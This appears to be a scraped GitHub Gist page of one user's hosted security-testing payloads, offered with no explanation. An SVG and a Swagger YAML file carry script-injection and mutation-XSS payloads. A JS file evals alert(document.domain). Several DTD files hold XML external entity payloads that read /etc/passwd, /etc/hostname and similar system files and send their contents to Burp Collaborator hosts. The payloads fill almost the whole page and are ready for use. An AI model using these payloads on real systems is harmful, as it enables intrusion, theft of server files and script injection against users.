Skip to content

Instantly share code, notes, and snippets.

@myuyu
myuyu / t.svg
Last active April 6, 2024 03:45
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
</script><script>alert(1)</script>
This file has been truncated, but you can view the full file.
a
b
c
d
e
f
g
h
i
j
swagger: '2.0'
info:
title: Example yaml.spec
description: |
<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
/accounts:
get:
responses:
'200':
<?xml version="1.0" encoding="UTF-8"?>
<!--
For cXML license agreement information, please see
http://www.cxml.org/home/license.asp
$Id: //ariba/specs/cXML/Common.mod#16 $
-->
<!--
A few character entities the XML recommendation says should be defined
@myuyu
myuyu / x.js
Last active April 12, 2024 14:25
top.eval('alert(document.domain)');
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://rjee7p9jxu03f68hrtn6c92ksbycm1.burpcollaborator.net?%file;'>">
%all;
@myuyu
myuyu / p.dtd
Last active February 24, 2022 07:26
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://w2zbslin91rjwptoh88kuo47jypzdo.burpcollaborator.net/?%file;'>">
%all;
@myuyu
myuyu / dddd.dtd
Last active February 15, 2022 16:01
<!ENTITY % file SYSTEM "file:///etc/debian_version">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://h1j4pfr9fkitxwq79j5wuzkaa1gy4n.burpcollaborator.net/POCCCCC?%file;'>">
%all;